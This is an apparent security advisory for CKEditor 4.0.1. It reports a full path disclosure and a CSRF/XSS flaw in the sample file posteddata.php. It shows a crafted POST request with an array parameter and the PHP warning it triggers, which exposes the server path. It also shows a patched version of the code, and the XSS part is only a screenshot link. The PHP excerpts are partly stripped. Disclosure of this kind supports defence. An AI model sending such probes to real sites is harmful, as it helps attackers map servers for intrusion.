===========================================
Vulnerable Software: ckeditor 4.0.1 standard
Download: http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip
Vulns: Full Path Disclosure && XSS
===========================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===========================================
Vulnerable Code: /ckeditor/samples/assets/posteddata.php
=============SNIP BEGINS====================
root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets# cat posteddata.php
Sample — CKEditor
CKEditor — Posted Data
Field Name
Value
$value )
{
if ( get_magic_quotes_gpc() )
$postedValue = htmlspecialchars( stripslashes( $value ) ) ;
else
$postedValue = htmlspecialchars( $value ) ;
?>
=============SNIP ENDS HERE====================
FULL Path Disclosure example:
URL: http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php
METHOD: $_POST
HEADERS:
Host: hacker1.own
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
$_POST DATA TO SEND:
bangbangbang[]=PATH DISCLOSURE
Result:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38
Print screen: http://i076.radikal.ru/1302/84/edbe3f8f4524.png
=================================================
CSRF+XSS
=================================================
Print Screen: http://i062.radikal.ru/1302/e6/25ef023dd589.png
=================================================
And here is fixed version: /ckeditor/samples/assets/posteddata.php
================SNIP BEGINS=======================
Sample — CKEditor
CKEditor — Posted Data
Field Name
Value
$value )
{
if ( get_magic_quotes_gpc() )
$postedValue = htmlspecialchars( stripslashes((string) $value ) ) ;
else
$postedValue =htmlspecialchars((string) $value ) ;
?>
=============ENJOYYY====================
KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
===========================================
/AkaStep